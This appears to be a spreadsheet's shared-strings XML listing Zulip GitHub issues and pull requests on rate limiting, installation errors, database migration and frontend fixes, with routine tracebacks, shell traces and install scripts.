    <t>webpack: Transpile JS code with Babel; This asks Babel to transpile to the subset supported by browsers defined in the .browserslistrc file, including polyfills as it deems necessary according to usage. Alternative to #12736. . (Cc: @tommyip). **Testing Plan:** Verified that the `=&gt;` from billing/upgrade.js is gone in both the dev and prod bundles. webpack-bundle-analyzer reports: [before](http://web.mit.edu/andersk/Public/zulip/report-2.0.0-1863-gc931e76cf2.html), [after](http://web.mit.edu/andersk/Public/zulip/report-2.0.0-1864-g00fb13f776.html). The app bundle increases by 11 KB gzipped due to added polyfills (look for core-js). Seems fine, but if we cared a lot, we could look into whether dropping browsers from .browserslistrc reduces this.</t>
  </si>
  <si>
    <t>nginx: Enable on-premise http2; don’t gzip already compressed files; **Testing Plan:** https://andersk.zulipdev.org</t>
  </si>
  <si>
    <t>_trigger_function(). RETURNS trigger AS $$. BEGIN. NEW.bigint_id = NEW.id;. RETURN NEW;. END. $$ LANGUAGE 'plpgsql';. CREATE TRIGGER zerver_usermessage_bigint_id_to_id_trigger. BEFORE INSERT ON zerver_usermessage. FOR EACH ROW. EXECUTE PROCEDURE zerver_usermessage_bigint_id_to_id_trigger_function();. /* run the migration setting bigint_id to id for old rows. in the meantime, the above trigger is taking care of the new ones */. CREATE UNIQUE INDEX CONCURRENTLY zerver_usermessage_bigint_id_idx ON zulip.zerver_usermessage (bigint_id);. /* take the server down for maintenance */. DROP TRIGGER zerver_usermessage_bigint_id_to_id_trigger ON zerver_usermessage;. DROP FUNCTION zerver_usermessage_bigint_id_to_id_trigger_function();. ALTER TABLE zulip.zerver_usermessage ALTER COLUMN bigint_id SET NOT NULL;. ALTER TABLE zulip.zerver_usermessage DROP CONSTRAINT zerver_usermessage_pkey;. DROP SEQUENCE zulip.zerver_usermessage_id_seq CASCADE;. ALTER TABLE zulip.zerver_usermessage RENAME COLUMN id to id_old;. ALTER TABLE zulip.zerver_usermessage RENAME COLUMN bigint_id to id;. ALTER TABLE zulip.zerver_usermessage ADD CONSTRAINT zerver_usermessage_pkey PRIMARY KEY USING INDEX zerver_usermessage_bigint_id_idx;. CREATE SEQUENCE zulip.zerver_usermessage_id_seq;. SELECT SETVAL('zulip.zerver_usermessage_id_seq', (SELECT MAX(id)+1 FROM zulip.zerver_usermessage));. ALTER TABLE zulip.zerver_usermessage ALTER COLUMN id SET DEFAULT NEXTVAL('zulip.zerver_usermessage_id_seq');. ALTER TABLE zulip.zerver_usermessage ALTER COLUMN id_old DROP NOT NULL;. /* finalize */. ALTER TABLE zulip.zerver_usermessage DROP COLUMN id_old;. ```. ## What remains to do:. Review and adjustments of course. Tools for more comprehensive testing of data integrity at various steps? More testing. I tried it around a bunch on the development environment, and it seems to work so far. Some kind of throttling of the process in the 0239 migration (copy id to bigint_id) so that it doesn't eat too much of the server's resources?</t>
  </si>
  <si>
    <t>Ratelimitfilter; EDIT: Oops, I didn't set the PR title properly and now can't edit it :see_no_evil: . Fixes https://github.com/zulip/zulip/issues/12595. I tried to more-or-less implement the idea for fixing this outlined there. The way I did this is pretty ugly, so I'll be happy to change it up if it can be made nicer. The comments in the code explain what's going on. Seems to work in the sense of passing the unit test added in commit 1 and with manual testing - I can kill ``memcached`` in development environment, do ``tools/run-dev.py`` and open the page in my browser - it leads to ``Fatal Python error: Cannot recover from stack overflow.`` before the changes, and normal handling with the changes. I'm not sure how to test whether this works correctly in terms of threading - if the thread-local variable acts like it should and each thread has its own version of it. It should be the case, as long as I didn't misread the documentation, but this seems like something that should get tested somehow before feeling happy with this fix :thinking: . As for the logging.error generated, nothing unusal about them I think and they can be rate limited just fine. Here's an example output (by making _RateLimitFilter print out info about the received logging record at the start of the function). It duplicates the errors printed, because it's printed one time by the _RateLimitFilter and once by Django's logging.error calls, but you can see the generated cache keys for the same error are the same each time:. https://pastebin.com/u783LAbr</t>
  </si>
  <si>
    <t>Email gateway postfix fatal error - "fatal: in parameter smtpd_relay_restrictions or smtpd_recipient_restrictions" - with workaround; I set up the email gateway without issue. But postfix mail log kept throwing this error:. ```. Sep 7 14:41:47 shaberu postfix/smtpd[15078]: fatal: in parameter smtpd_relay_restrictions or smtpd_recipient_restrictions, specify at least one working instance of: reject_unauth_destination, defer_unauth_destination, reject, defer, defer_if_permit or check_relay_domains. Sep 7 14:41:48 shaberu postfix/master[14321]: warning: process /usr/lib/postfix/sbin/smtpd pid 15078 exit status 1. Sep 7 14:41:48 shaberu postfix/master[14321]: warning: /usr/lib/postfix/sbin/smtpd: bad command startup -- throttling. ```. Inserting the line:. compatibility_level=2. into the postfix `main.cf` seems to have fixed it as a dirty hack, but I have no idea what the real fix should be, as this will be overwritten by puppet (I could not find how to configure puppet). Any help would be appreciated.</t>
  </si>
  <si>
    <t>run-dev: Disable Tornado response decompression; Apparently Tornado decompresses gzip responses by default. Worse, it fails to adjust the `Content-Length` header when it does. https://github.com/tornadoweb/tornado/issues/2743. **Testing Plan:** Download a tarball from http://localhost:9991/#organization/data-exports-admin.</t>
  </si>
  <si>
    <t>"/root/zulip-server-2.1.2/scripts/lib/zulip_tools.py",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During handling of the above exception, another exception occurred:. Traceback (most recent call last):. File "/root/zulip-server-2.1.2/scripts/lib/create-production-venv", line 45, in &lt;module&gt;. virtualenv_args=['-p', 'python{}'.format(python_version)]). File "/root/zulip-server-2.1.2/scripts/lib/setup_venv.py", line 290, in setup_virtualenv. do_setup_virtualenv(cached_venv_path, requirements_file, virtualenv_args or []). File "/root/zulip-server-2.1.2/scripts/lib/setup_venv.py", line 337, in do_setup_virtualenv. install_venv_deps(pip, requirements_file). File "/root/zulip-server-2.1.2/scripts/lib/setup_venv.py", line 106, in install_venv_deps. run([pip, "install", "--no-deps", "--require-hashes", "--requirement", requirements_file]). File "/root/zulip-server-2.1.2/scripts/lib/zulip_tools.py",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Zulip installation failed (exit code 1)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log</t>
  </si>
  <si>
    <t>Optimize rate_limiter performance for get_events queries; See https://chat.zulip.org/#narrow/stream/3-backend/topic/profiling.20get_events/near/816860 for profiling details, but basically, currently a get_events request spends 1.4ms/request talking to redis for our rate limiter, which is somewhere between 15% and 50% of the total request runtime (my measurement technique is susceptible to issues like the first request on a code path being extra expensive). Since get_events is our most scalability-critical endpoint, this is a big deal. We should do some rethinking of the redis internals for our rate limiter. I have a few ideas:. * Writing an alternative rate-limiter implementation for `get_events `specifically that's entirely in-process and would be basically instant. Since the Tornado system has a relatively strong constraint that a given user always connect to the same server, this might be fairly cheap to implement and would bring that 1.4ms to probably 50us or less. (And gate it on `RUNNING_INSIDE_TORNADO`). . * Look at rewriting our redis transactions to be more efficient for the highest-traffic cases (E.g. user is not close to limit, or user is way over limit). E.g. maybe `incr_rateimit` should automatically return the `api_calls_left` result rather than requiring 2 transactions. * Looking at https://github.com/popravich/python-redis-benchmark, there may be some alternative async IO redis clients we could consider migrating to, and possibly some that are just faster. Given how little code we have interacting with redis directly, this might be an easy port to do; I'm not sure whether or not it would help. (And unlike the in-process hack approach, this would have side benefits to non-Tornado endpoints).</t>
  </si>
  <si>
    <t>-2.1.2/zproject/prod_settings_template.py /etc/zulip/settings.py. + '[' -n zulip ']'. + sed -i 's/^EXTERNAL_HOST =.*/EXTERNAL_HOST = '\''zulip'\''/' /etc/zulip/settings.py. + '[' -n root@localhost.localdomain ']'. + sed -i 's/^ZULIP_ADMINISTRATOR =.*/ZULIP_ADMINISTRATOR = '\''root@localhost.localdomain'\''/' /etc/zulip/settings.py. + ln -nsf /etc/zulip/settings.py /tmp/tmp.yliyQLjARE/zulip-server-2.1.2/zproject/prod_settings.py. + /tmp/tmp.yliyQLjARE/zulip-server-2.1.2/scripts/setup/generate_secrets.py --production. Traceback (most recent call last):. File "/tmp/tmp.yliyQLjARE/zulip-server-2.1.2/scripts/setup/generate_secrets.py", line 11, in &lt;module&gt;. import scripts.lib.setup_path_on_import. File "/tmp/tmp.yliyQLjARE/zulip-server-2.1.2/scripts/lib/setup_path_on_import.py", line 14, in &lt;module&gt;. if not os.path.exists(activate_locals["site_packages"]):. KeyError: 'site_packages'. Zulip installation failed (exit code 1)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. root@zulip-2001:/tmp/tmp.yliyQLjARE/zulip-server-2.1.2#. ```. Something about how the virtualenv at `/srv/zulip-venv-cache/$hash` is being created is causing issues (note that I was able to recreate this with Zulip 2.0.7 as well). ## Steps to recreate. I provisioned an Ubuntu 18.04 container with LXD and performed the following:. 1. `pip3 install virtualenv==20.0.1`, then followed the [installation guide](https://zulip.readthedocs.io/en/stable/production/install.html#installer-details):. 2. `cd $(mktemp -d); wget https://www.zulip.org/dist/releases/zulip-server-latest.tar.gz; tar -xf zulip-server-latest.tar.gz`. 3. `zulip-server-*/scripts/setup/install --self-signed-cert --email=root@localhost.localdomain --hostname=zulip`. When version 20.0.1 is substituted with 15.1.0 or 16.7.10 on an identical container, the install process fin</t>
  </si>
  <si>
    <t>Improve logging of User-Agent for errors and official clients; Currently, all of our API requests go through decorators that call `process_client`. This does 3 things:. * Parse the User-Agent and determine whether the client (claims to be) an official Zulip client or not. * Call `get_client` and store `request.client` with a `Client` object, which is needed for. * Call `process_user_activity` to trigger UserActivity logging. For `get_events`, #13917 has some ideas for further work we'll want to do there that one should be mindful of. There are a few problems:. * `write_log_line` only can specify which client was used in requests that fail authentication or rate limiting, since `process_client` is never called. This could be fixed by calling `get_client_name` in the except clause, but that's duplicating work. * `write_log_line` doesn't have access to the client version, which would be a nice touch to include in `write_log_line` where we display the client (e.g. `ZulipMobile/2.1.3`), since that's not stored in Client objects. It just does `?` inside an `except` block instead. . What I'd like to do instead is to split `process_client`:. * `process_user_agent`: Does `get_client_name`, attaches it as `request.client_name` and if it's an official client, store the version in `request.client_version` (otherwise set that to None). Called early, potentially it could be in the LogRequests `process_request` middleware since it'd be really cheap and there'd be a lot of duplication involved in calling it everywhere via decorators. * `process_client`: Calls `get_client` and `update_user_activity`, using `request.client_name` as an input. We'd still store `request.client`. We may want to do the version piece as commits at the end as it may involve some refactoring of the User-Agent code to plumb the data through properly. As a sidenote, `process_user_activity` should probably transmit the client by ID, not name, since we don't need the name in the queue worker. We'll definitely ne</t>
  </si>
  <si>
    <t>[WIP] Rate limiter refactor to allow straightforward adding/changing of implementations; Still requires cleaning up of comments (for example ``clear_history`` has an old docstring, that's not even correct anymore). This aims to split our rate limiting logic into two classes mostly: ``RateLimitedObject``, which keep its nature, but we remove redis implementation details from it, and ``RateLimiterBackend`` - which is an interface, on which any implementation can be based. Our current redis-based implementation logic is moved into ``RedisRateLimiterBackend`` - an implementation of the interface. With this, changing or adding a new implementation just requires making another class like that, and should be independent from any of the more abstract ``RateLimitedObject`` logic. The last commit, though its implementation of details is very incomplete, shows a draft of how we can add the alternative tornado rate limiter in a decently clean way.</t>
  </si>
  <si>
    <t>AttributeError: 'LogRecord' object has no attribute 'status_code'; I have a development environment with the latest Git version. After performing many requests, I get blocked because of rate limiting. Then, the following error is logged in the console:. ```. ----------------------------------------. Exception happened during processing of request from ('127.0.0.1', 56444). 2020-04-16 11:35:49.159 INFO [zr] 127.0.0.1 POST 429 65ms (mem: 57ms/4) (+start: 24ms) /json/messages (10@zulip via website). 2020-04-16 11:35:49.160 INFO [zr] status=429, data=b'{"result":"error","msg":"API usage exceeded rate limit","retry-after":2.6131470203}\n', uid=10@zulip. 2020-04-16 11:35:49.162 INFO [zr] 127.0.0.1 POST 429 11ms (mem: 7ms/2) /json/messages (10@zulip via website). 2020-04-16 11:35:49.162 WARN [django.server] "POST /json/messages HTTP/1.1" 429 84. 2020-04-16 11:35:49.173 INFO [zr] status=429, data=b'{"result":"error","msg":"API usage exceeded rate limit","retry-after":2.6109778881}\n', uid=10@zulip. 2020-04-16 11:35:49.179 INFO [zr] 127.0.0.1 POST 429 20ms (+start: 51ms) /json/messages (10@zulip via website). 2020-04-16 11:35:49.182 WARN [django.server] "POST /json/messages HTTP/1.1" 429 84. 2020-04-16 11:35:49.195 INFO [zr] status=429, data=b'{"result":"error","msg":"API usage exceeded rate limit","retry-after":2.5940015316}\n', uid=10@zulip. Traceback (most recent call last):. File "/usr/lib/python3.7/socketserver.py", line 650, in process_request_thread. self.finish_request(request, client_address). File "/usr/lib/python3.7/socketserver.py", line 360, in finish_request. self.RequestHandlerClass(request, client_address, self). File "/usr/lib/python3.7/socketserver.py", line 720, in __init__. self.handle(). File "/srv/zulip-py3-venv/lib/python3.7/site-packages/django/core/servers/basehttp.py", line 171, in handle. self.handle_one_request(). File "/srv/zulip-py3-venv/lib/python3.7/site-packages/django/core/servers/basehttp.py", line 187, in handle_one_request. if not self.pa</t>
  </si>
  <si>
    <t>pylibmc.SomeErrors: error 19 from flush_all: (0xf6e200) AUTHENTICATION FAILURE; When i want to install Zulip in ubuntu 18.0.4. i get :. `Traceback (most recent call last):. File "/home/ubuntu/zulip-server-2.1.6/scripts/setup/flush-memcached", line 18, in &lt;module&gt;. behaviors=settings.CACHES["default"]["OPTIONS"] # type: ignore # settings not typed properly. pylibmc.SomeErrors: error 19 from flush_all: (0xf6e200) AUTHENTICATION FAILURE, host: 127.0.0.1:11211 -&gt; libmemcached/sasl.cc:292. Zulip installation failed (exit code 1)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. `</t>
  </si>
  <si>
    <t>Add support for Ubuntu 20.04 Focal Fossa; Currently it's not possible to install Zulip with the latest stable version on a Ubuntu 20.04 "Focal Fossa". ```. +++ dirname ./zulip-server-2.1.7/scripts/lib/install. ++ readlink -f ./zulip-server-2.1.7/scripts/lib/../.. + ZULIP_PATH=/tmp/tmp.sSzOHC0KQA/zulip-server-2.1.7. + localedef -i en_US -f UTF-8 en_US.UTF-8. + export LC_ALL=en_US.UTF-8. + LC_ALL=en_US.UTF-8. + export LANG=en_US.UTF-8. + LANG=en_US.UTF-8. + export LANGUAGE=en_US.UTF-8. + LANGUAGE=en_US.UTF-8. + apt-get install -y lsb-release. Reading package lists... Building dependency tree... Reading state information... lsb-release is already the newest version (11.1.0ubuntu2). 0 upgraded, 0 newly installed, 0 to remove and 0 not upgraded. ++ lsb_release --short --id --release --codename. + os_info='Ubuntu. 20.04. focal'. + read -r os_id. + read -r os_release. + read -r os_codename. + case "$os_codename" in. + set +x. Unsupported OS release: focal. Zulip in production is supported only on:. - Debian 9 "stretch". - Debian 10 "buster". - Ubuntu 16.04 LTS "xenial". - Ubuntu 18.04 LTS "bionic". For more information, see:. https://zulip.readthedocs.io/en/latest/production/requirements.html. Zulip installation failed (exit code 1)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. I see (here: https://zulip.readthedocs.io/en/latest/production/requirements.html ) that the latest but not stable version has support for Ubuntu 20.04 - when you are planning to release a stable version with support.</t>
  </si>
  <si>
    <t>installation errors: terminate-psql-sessions: Permission denied, and zulip user already exists; I'm attempting to install by cloning the Github repo onto a box upgraded to Ubuntu 20.04. I'm running the installation command as root: . ```. # ./zulip/scripts/setup/install --certbot --email=myemail@gmail.com --hostname=zulip.mydomain.org. ```. The first error I got was this:. ```. + has_class zulip::postgres_common. + grep -qx zulip::postgres_common /var/lib/puppet/classes.txt. + '[' -z '' ']'. + /tmp/tmp.hsRNDO5fPh/zulip/scripts/setup/postgres-init-db. + POSTGRES_USER=postgres. ++ cd /. ++ su postgres -c 'psql -v ON_ERROR_STOP=1 -Atc '\''SELECT COUNT(*) FROM zulip.zerver_message;'\'' zulip'. psql: error: could not connect to server: FATAL: database "zulip" does not exist. + records=. + '[' -e /var/run/supervisor.sock ']'. + supervisorctl stop all. process-fts-updates: stopped. ++ dirname /tmp/tmp.hsRNDO5fPh/zulip/scripts/setup/postgres-init-db. + su -s /usr/bin/env - -- postgres /tmp/tmp.hsRNDO5fPh/zulip/scripts/setup/terminate-psql-sessions zulip zulip_base. -env: ‘/tmp/tmp.hsRNDO5fPh/zulip/scripts/setup/terminate-psql-sessions’: Permission denied. Zulip installation failed (exit code 126)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. The second error I got (when I tried rerunning) was this:. ```. + useradd -m zulip --home-dir /home/zulip. useradd: user 'zulip' already exists. Zulip installation failed (exit code 9)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```.</t>
  </si>
  <si>
    <t>rate_limit: Handle the case of request.user being a RemoteZulipServer.; For now we can just skip rate limiting for this case and rate limit by. the server uuid or simply by IP in a follow-up.</t>
  </si>
  <si>
    <t>Rate limits</t>
  </si>
  <si>
    <t>webhooks: Do not log RateLimited exception to webhook logger.; In `authenticated_rest_api_view` (but not `webhook_view`) the rate. limiting happens inside the `try` / `catch` block that potentially. reports errors to the webhook logger (and thus Sentry, if so. configured). Rate limits are `RateLimited` exceptions, which do not. descend from `JsonableError` (the `RateLimitMiddleware` deals with. transforming them), and as such are, by default, logged; . Skip logging `RateLimited` exceptions to the webhook logger.</t>
  </si>
  <si>
    <t>Was able to trigger hundreds of emails; Hey, so I wanted to open this task because in messing with the api I accidentally triggered hundreds of emails to myself, and b/c you're sending them directly from @zulip.com I don't know if this is the sort of thing you want to prevent, in order to avoid domain reputation issues (like, gmail starting to send emails from zulip to spam.). Basically I accidentally called init from zulip-js in a react loop, so it got called hundreds of times before the api rate limit kicked in. That part is well and good, I think, but because I was using username/password (or maybe this also would have happened with api key), each of those init calls triggered a "New login from Chrome on macOS" email. They're slowly filtering into my gmail account in batches of 20-30 at a time. Some possible thoughts:. 1/ Should that email should have been sent so frequently? 2/ Should be a circuit breaker on email sends. 3/ Should automatic mail from zulip be sent from something like a `zulipmail.com` domain? 4/ Or maybe this isn't that big of a deal</t>
  </si>
  <si>
    <t>Document email mirror rate limit; We should add a note on https://zulip.readthedocs.io/en/latest/production/email-gateway.html and/or https://zulip.com/help/message-a-stream-by-email that incoming emails are rate-limited, and lay out the current limits:. - 50 emails per minute. - 120 emails per 5 minutes. - 600 emails per hour. These limits are defined in zproject/computed_settings.py, and a comment should be left there pointing to whichever of the two locations above document it, so that the values don't skew from the docs.</t>
  </si>
  <si>
    <t>Install script assumes useradd to be available; I am not sure, whether this constitutes a proper issue, but here we go:. I tried installing Zulip server according to the guide at &lt;https://zulip.readthedocs.io/en/stable/production/install.html#step-2-install-zulip&gt;. I changed `--certbot` to `--self-signed-cert`. This is because I am installing inside a virtual machine to test things out. ```shell. ./scripts/setup/install --self-signed-cert --email='my-email-is-here' --hostname='zulip.localhost.com'. ```. In addition I changed my `/etc/hosts/` file to resolve `localhost.com` to `127.0.0.1`. My VM has a Debian installed:. ```shell. $ lsb_release -a. No LSB modules are available. Distributor ID:	Debian. Description:	Debian GNU/Linux 10 (buster). Release:	10. Codename:	buster. ```. I downloaded the latest release `zulip-server-latest.tar.gz`:. ```shell. $ sha256sum zulip-server-latest.tar.gz. 50a13655cb30ba30b0bfaf8e5a1fea46a73b5f26864f503c1cdf204f9f09da52 zulip-server-latest.tar.gz. ```. I get the following error when running the install command as written above:. ```. ... Extracting to /srv/zulip-yarn... Adding to /usr/bin. Successfully installed Yarn 1.22.4! + mkdir -p /etc/zulip. + id -u zulip. + useradd -m zulip --home-dir /home/zulip. ./scripts/lib/install: line 377: useradd: command not found. Zulip installation failed (exit code 127)! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. This is probably, because on Debian there is no `useradd`. I did not see a "compatible with the following distros" in the readme, so this might be an oversight or it might be by design, as Ubuntu or another distro might be assumed. Perhaps the script can be made to work with Debian as well? If you need more info, just ask and I will try to provide. Thanks!</t>
  </si>
  <si>
    <t>server-side rendering</t>
  </si>
  <si>
    <t>[WIP] markdown: Fix fenced code bug when message is quote and reply.; &lt;!-- What's this PR for? (Just a link to an issue is fine.) --&gt;. Fixes part of #17610, #15672. **Testing plan:** &lt;!-- How have you tested? --&gt;. Automated tested using ./tools/test-backend. Manually tested on all the cases discussed in #17610, #15672, and given on [Common Mark](https://spec.commonmark.org/0.29/#fenced-code-blocks). All cases are showing the expected results after server-side rendering. Frontend part is still showing the wrong results. **GIFs or screenshots:** &lt;!-- If a UI change. See:. https://zulip.readthedocs.io/en/latest/tutorials/screenshot-and-gif-software.html. --&gt;. ![15672](https://user-images.githubusercontent.com/70478296/111083678-b9630500-8534-11eb-9470-91174091c904.png).</t>
  </si>
  <si>
    <t>Prepare smokescreen better to be a documented feature; This PR has a couple items I wrote down while updating our changelog. * Document that smokescreen exists in a few more natural places. I think this is probably the complete set of places we want to link, but perhaps it's worth your spending a few minutes thinking about adding more. * Move its configuration to the right directory. @alexmv I don't love the documentation text, in part because many readers won't know what SSRF is (maybe a third-party link can help). I'd appreciate it if you just did an edit pass and pushed back here, as I'm trying to juggle a dozen tasks like this.</t>
  </si>
  <si>
    <t>compose: Make the route of message sending through drafts.; Fixes #17697. See the commit description for more details. I will remove the console logs after few checks. [CZO Link here](https://chat.zulip.org/#narrow/stream/2-general/topic/Ease.20of.20message.20recovery.20.2317697). &lt;!-- What's this PR for? (Just a link to an issue is fine.) --&gt;. **Testing plan:** &lt;!-- How have you tested? --&gt;. Tested this manually right now. Here I am adding some details on how to test:. 1. Testing of locally echoed message -. Try to send a message first simply, it should have sent successfully and the message should not be in the drafts. Now prepare another message, and before sending it. In the developer tools -&gt; network tab -&gt; Make the network offline and then try sending the message. The message will get failed, and see the draft of that message will be in the drafts tab. Now make the network again to no throttling in the network tab of developer tools. And retry sending the message, the message will be sent successfully and the draft will be deleted. 2. Testing of a non locally echoed message (eg. a message including an image). The draft will not be saved for these messages and they remain in the compose box until the server gives a success signal for it. So, no need to save draft for these. Test by simply following the above procedure. A gif of the above testing. ![draft-message](https://user-images.githubusercontent.com/56730716/121870429-aa9d1180-cd20-11eb-924d-db34c6659fa0.gif). &lt;!-- Also be sure to make clear, coherent commits:. https://zulip.readthedocs.io/en/latest/contributing/version-control.html. --&gt;. Some questions:. 1. What if the user deletes the draft and resend the message successfully? &gt; Well in this case, the draft when doesn't exists. It does not matter, it also do not create any error. 2. If the user again opens the message from draft and tries to send it. &gt; This is also not creating any problem as it will not allow to locally echo the message in that case. It</t>
  </si>
  <si>
    <t>Make remote servers respect our rate limits on requests to the push bouncer; In 85cbdc890438686c8996960b30adf900def57c7d we've added rate limiting of requests to the push bouncer by remote servers. We should make the request-making code correctly handle rate-limiting - primarily a good retry mechanism will be needed, and we also probably should log a warning when hitting the limits. The function where requests directly happen is `send_to_push_bouncer` in `zerver/lib/remote_server.py` and at a higher level, push notifications are handled by `PushNotificationsWorker` - though we will make requests to the bouncer in some other circumstances not handled by the worker as well, such as adding/removing a new user's device. https://github.com/zulip/zulip/pull/16190#discussion_r519059739 has some background discussion</t>
  </si>
  <si>
    <t>Revert "request: Refactor to record rate limit data using ZulipRequestNotes."; This reverts commit 3f9a5e1e17f0e5f50430300dfcf6e0cce11e899b, providing a temporary fix before finding a way to rewrite it without memory leak. [chat](https://chat.zulip.org/#narrow/stream/3-backend/topic/HttpRequest.20-.3E.20ZulipHttpRequest.20conversion/near/1232467)</t>
  </si>
  <si>
    <t>Rate-limit by IP any publicly-accessible email-sending endpoints; #16190 added IP-based rate-limiting for un-authed requests in the `rate_limit` view decorator, which is effectively just REST endpoints. However, there are non-REST unauthenticated endpoints which also bear protecting. Specifically, the `/accounts/find/` and `/new/` endpoints automatically send emails to user-supplied addresses, and are not currently rate-limited. We should add an additional `authenticate_by_ip` rate limiting rule at 5/30min (matching the `authenticate_by_username` rule), and enforce that ratelimit for the above two endpoints.</t>
  </si>
  <si>
    <t>Rate limit the /new/ endpoint; Addressing a piece of #19287. This only covers one endpoint, but the others can be done with a similar approach, so it seems to make sense to decide on whether the approach is fine and then do the other endpoints. Also the conversation in https://github.com/zulip/zulip/pull/16190#discussion_r670707718 is relevant here - @alexmv With this approach we would start using `domain` rather than removing it, does that seem right? Alternatively, we could still get rid of `domain` and instead define separate `RateLimitedSomething` classes per endpoint - but that seems worse and the `domain` concept was probably made with this kind of scenario in mind</t>
  </si>
  <si>
    <t>Show a proper html page when rate limited at the /new/ endpoint.; Follow-up to https://github.com/zulip/zulip/pull/19319. Previously this showed a json error, but this is an endpoint that human. users use in the browser, so a proper HTML page is more appropriate. ![image](https://user-images.githubusercontent.com/45007152/126904387-39c88989-25a4-4b0c-bf36-7d0d0059a191.png).</t>
  </si>
  <si>
    <t>rate_limit: Rate limit the /accounts/find/ endpoint.; Closes #19287. This endpoint allows submitting multiple addresses so we need to "weigh". the rate limit more heavily the more emails are submitted. Clearly e.g. a request triggering emails to 2 addresses should weigh twice as much as. a request doing that for just 1 address.</t>
  </si>
  <si>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</si>
  <si>
    <t>The `delete_after_upload` flag in export_realm_wrapper should also delete the `output_dir`; https://github.com/zulip/zulip/blob/73a6f2a1a7fbfb939b8bdaded4148f9dcf8a6e81/zerver/lib/export.py#L1944-L1980. After a successful export and upload, the `delete_after_upload` flag will delete the `.tar.gz` file -- but will leave the full un-gzip'd `output_dir`. This means that even successful exports will build up in `/tmp` over time. We should make the `delete_after_upload` flag also delete the `output_dir`.</t>
  </si>
  <si>
    <t>Rate limit uploaded file access for users.; TODO:. - [ ] Rate limit avatars. - [ ] Rate limit custom emoji. - [x] Rate limit uploads. - [x] Rate limit thumbnails. Fixes #19840</t>
  </si>
  <si>
    <t>settings: Add rate limiting for email address changes.; Co-authored-by: Alex Vandiver &lt;alexmv@zulip.com&gt;. **Testing plan:** Needs a test still.</t>
  </si>
  <si>
    <t>Zulip - Update from latest git main; When I try to run to update Zulip via git I run into following issue:. ```. Using cached Python venv from /srv/zulip-venv-cache/4293996ea9b81a02690e78a21ea2f1f0bc2e6597/zulip-py3-venv. + ln -nsf /srv/zulip-venv-cache/4293996ea9b81a02690e78a21ea2f1f0bc2e6597/zulip-py3-venv /home/zulip/deployments/2021-11-05-21-47-46/zulip-py3-venv. % Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed. 100 1216k 100 1216k 0 0 8883k 0 --:--:-- --:--:-- --:--:-- 8883k. yarn-1.22.17.tgz: OK. Traceback (most recent call last):. File "/home/zulip/deployments/2021-11-05-21-47-46/scripts/lib/upgrade-zulip-stage-2", line 169, in &lt;module&gt;. subprocess.check_call([os.path.join(deploy_path, "scripts", "lib", "install-yarn")]). File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['/home/zulip/deployments/2021-11-05-21-47-46/scripts/lib/install-yarn']'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 few days ago everything was working to update from git. Additional Infos:. .) Ubuntu 20.04.3 LTS. .) Memory 16GB. .) CPU 4 Cores. I tried to reinstall it and update it again before trying to migrate.</t>
  </si>
  <si>
    <t>rate_limit: Fix logging string when rate limiting email gateway.; realm.name is not the right "name" to log, we should use realm.subdomain. like everywhere else.</t>
  </si>
  <si>
    <t>/zulip-venv-cache/35822fb2ce4176dd4baaa2aed71c8dc1ac1db4af/zulip-py3-venv. + ln -nsf /srv/zulip-venv-cache/35822fb2ce4176dd4baaa2aed71c8dc1ac1db4af/zulip-py3-venv /home/zulip/deployments/2021-12-10-11-45-31/zulip-py3-venv. % Total % Received % Xferd Average Speed Time Time Time Current. Dload Upload Total Spent Left Speed. 100 1216k 100 1216k 0 0 14.1M 0 --:--:-- --:--:-- --:--:-- 14.1M. yarn-1.22.17.tgz: OK. Traceback (most recent call last):. File "/home/zulip/deployments/2021-12-10-11-45-31/scripts/lib/upgrade-zulip-stage-2", line 169, in &lt;module&gt;. subprocess.check_call([os.path.join(deploy_path, "scripts", "lib", "install-yarn")]). File "/usr/lib/python3.8/subprocess.py", line 364, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['/home/zulip/deployments/2021-12-10-11-45-31/scripts/lib/install-yarn']'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I investigated the script for this:. ```. #!/usr/bin/env bash. set -euo pipefail. version=1.22.17. sha256=267982c61119a055ba2b23d9cf90b02d3d16c202c03cb0c3a53b9633eae37249. tarball="yarn-$version.tgz". check_version() {. # Reading the version of Yarn from its package.json is much faster. # than running yarn --version. link="$(command -v yarn)" \. &amp;&amp; bin="$(readlink -f "$link")" \. &amp;&amp; [ "$bin" = /srv/zulip-yarn/bin/yarn ] \. &amp;&amp; current_version="$(jq -r '.version' /srv/zulip-yarn/package.json)" \. &amp;&amp; [ "$current_version" = "$version" ]. }. if ! check_version; then. tmpdir="$(mktemp -d)". trap 'rm -r "$tmpdir"' EXIT. cd "$tmpdir". curl -fLO "https://registry.npmjs.org/yarn/-/$tarball". sha256sum -c &lt;&lt;&lt;"$sha256 $tarball". rm -rf /srv/zulip-yarn. mkdir /srv/zulip-yarn. tar -xzf "$tarball" --no-same-owner --strip-components=1 -C /sr</t>
  </si>
  <si>
    <t>api_documentation: Update rate limit error description.; Moves details about the rate limit error object and handling to the OpenAPI documentation description for that common error. Previously, this information was on the general rest error handling documentation page without clear connection to the specific rate limit error. See [this CZO chat](https://chat.zulip.org/#narrow/stream/378-api-design/topic/error.20docs) for more context. Also, fixes a typo in the change log (feature 36) for that same error and a misplaced colon in the description of the error. for missing request parameters.</t>
  </si>
  <si>
